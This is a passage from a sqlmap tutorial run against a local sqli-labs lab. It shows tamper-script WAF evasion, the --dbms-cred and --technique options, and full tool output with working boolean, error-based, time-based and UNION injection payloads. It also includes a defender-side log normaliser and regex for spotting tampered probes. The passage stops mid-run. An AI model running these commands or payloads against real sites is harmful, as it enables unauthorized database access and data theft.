[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL inline queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[10:38:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:38:15] [WARNING] GET parameter 'id' does not seem to be injectable
[10:38:15] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 10:38:15 /2020-03-01/


5. sqlmap tamper scripts

Apart from replacing single-quoted strings with their CHAR() equivalent, sqlmap itself does not obfuscate the payloads it sends;
to bypass WAFs and other protection mechanisms sqlmap uses tamper scripts. All tamper scripts shipped with sqlmap can be found in the tamper folder.
When configuring the injection payload position, the --tamper option can be used alongside it. Now add the option to the test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc" --tamper=space2comment --banner

Output:

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:46:09 /2020-03-01/

[10:46:09] [INFO] loading tamper module 'space2comment'
[10:46:09] [INFO] testing connection to the target URL
[10:46:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:46:09] [INFO] testing if the target URL content is stable
[10:46:10] [INFO] target URL content is stable
[10:46:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:46:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:46:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:46:12] [WARNING] reflective value(s) found and filtering out
[10:46:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:46:12] [INFO] testing 'Generic inline queries'
[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:46:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:46:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL inline queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]

[10:46:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:46:16] [WARNING] GET parameter 'id' does not seem to be injectable
[10:46:16] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests

[*] ending @ 10:46:16 /2020-03-01/
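As an added defender-side example (not part of the tutorial or of sqlmap), the normaliser below undoes what the space2comment tamper does, replacing inline comments with spaces before pattern matching, and runs it over constructed access-log lines; the log format, addresses and regular expressions are assumptions, not anything sqlmap ships.

```python
import re
from urllib.parse import parse_qsl

# Constructed access-log lines (not real traffic). The second request carries
# a boolean-blind probe in the shape the space2comment tamper produces: every
# space replaced by the inline comment /**/, then URL-encoded by the client.
LOG_LINES = [
    '10.0.0.5 - - [01/Mar/2020:10:46:12 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 731',
    '10.0.0.5 - - [01/Mar/2020:10:46:13 +0000] "GET /sqli-labs/Less-1/?id='
    '1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F7837%3D7837%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27abc%27%3D%27abc'
    ' HTTP/1.1" 200 731',
    '10.0.0.9 - - [01/Mar/2020:10:46:20 +0000] "GET /sqli-labs/Less-1/?id=2 HTTP/1.1" 200 744',
]

# Common log format: client address and the request line are all we need.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+) HTTP/')
# Any /* ... */ inline comment, including the empty /**/ space2comment emits.
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
# "<AND|OR> x = x" with optional bracket and quotes: the tautology shape of
# sqlmap's boolean-based blind probes (e.g. AND 7837=7837, AND ('abc'='abc).
TAUTOLOGY_RE = re.compile(
    r"\b(AND|OR)\s+\(?\s*'?([^'=\s()]+)'?\s*=\s*'?\2'?", re.I)


def normalize(value: str) -> str:
    """Undo the tamper: inline comments become spaces, whitespace is collapsed."""
    value = COMMENT_RE.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()


def extract_params(line: str):
    """Return (ip, {param: value}) after one round of URL decoding, or None
    when the line is not a request we can parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = m.group("path").partition("?")[2]
    return m.group("ip"), dict(parse_qsl(query, keep_blank_values=True))


def scan(lines):
    """Flag every parameter whose normalized value contains a tautology."""
    findings = []
    for line in lines:
        parsed = extract_params(line)
        if parsed is None:
            continue
        ip, params = parsed
        for name, raw in params.items():
            clean = normalize(raw)
            if TAUTOLOGY_RE.search(clean):
                findings.append({"ip": ip, "param": name, "value": clean})
    return findings


if __name__ == "__main__":
    for finding in scan(LOG_LINES):
        print(finding)
```

Matching on the normalized value is what makes the comment-stuffed probe and the plain one look the same to the rule; other tamper scripts change the payload differently, so each one needs its own normalization step, and a regex like this is a triage heuristic rather than a parser.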


6. sqlmap DBMS authentication

Set the DBMS credentials with the following option:
--dbms-cred=username:password
This feature is actually of limited use: if you already know the database username and password, there is no need to probe again, just connect to the database directly.
To test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --dbms-cred="root:root" --banner

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:55:37 /2020-03-01/

[10:55:37] [INFO] testing connection to the target URL
[10:55:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:55:37] [INFO] testing if the target URL content is stable
[10:55:38] [INFO] target URL content is stable
[10:55:38] [INFO] testing if GET parameter 'id' is dynamic
[10:55:38] [INFO] GET parameter 'id' appears to be dynamic
[10:55:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:55:38] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:55:38] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:55:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:55:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:55:40] [INFO] testing 'Generic inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:55:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:55:40] [INFO] testing 'MySQL inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:55:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:55:50] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:55:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:55:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:55:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:55:50] [INFO] target URL appears to have 3 columns in query
[10:55:50] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 9058=9058 AND ('dhTu'='dhTu

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1') AND (SELECT 6167 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(6167=6167,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('ETjb'='ETjb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 4161 FROM (SELECT(SLEEP(5)))PeGx) AND ('WPLo'='WPLo

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2145') UNION ALL SELECT NULL,NULL,CONCAT(0x716a716a71,0x5758644165596a476969716e597763436e4c506652536466735754476a73534a6a6b7776486c6f45,0x716b6a6b71)-- -
---
[10:55:56] [INFO] the back-end DBMS is MySQL
[10:55:56] [INFO] fetching banner
[10:55:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:55:56] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 10:55:56 /2020-03-01/


V. sqlmap injection technique options

1. Setting a specific SQL injection technique in sqlmap

Option:
--technique
This option specifies which techniques are used during injection detection. By default sqlmap uses every technique it supports;
the option takes upper-case letters naming the detection techniques, and its value is one or more of B, E, U, S, T and Q, meaning:

  • B: Boolean-based blind (boolean injection)
  • E: Error-based (error injection)
  • U: UNION query-based (union query injection)
  • S: Stacked queries (multi-statement injection)
  • T: Time-based blind (time-delay injection)
  • Q: Inline queries (nested query injection)

For example:
--technique ES specifies that these two detection techniques are used;
--technique BEUSTQ is equivalent to the default.
Boolean-based blind injection test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique B --current-db

Output:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:01:28 /2020-03-01/

[11:01:28] [INFO] testing connection to the target URL
[11:01:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:01:29] [INFO] testing if the target URL content is stable
[11:01:29] [INFO] target URL content is stable
[11:01:29] [INFO] testing if GET parameter 'id' is dynamic
[11:01:29] [INFO] GET parameter 'id' appears to be dynamic
[11:01:29] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:01:29] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:01:29] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[11:01:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:01:35] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:01:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 7837=7837 AND ('Inoj'='Inoj
---
[11:01:38] [INFO] testing MySQL
[11:01:38] [INFO] confirming MySQL
[11:01:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:01:38] [INFO] fetching current database
[11:01:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:38] [INFO] retrieved: security
current database: 'security'
[11:01:39] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 11:01:39 /2020-03-01/


As expected, the only injection type reported this time is boolean-based blind.

2. Setting the time-based blind injection delay in sqlmap

Option:
--time-sec
Use this option to set the delay used by time-based blind injection; the default is 5 seconds.

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --current-db --time-sec 3

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:06:57 /2020-03-01/

[11:06:57] [INFO] testing connection to the target URL
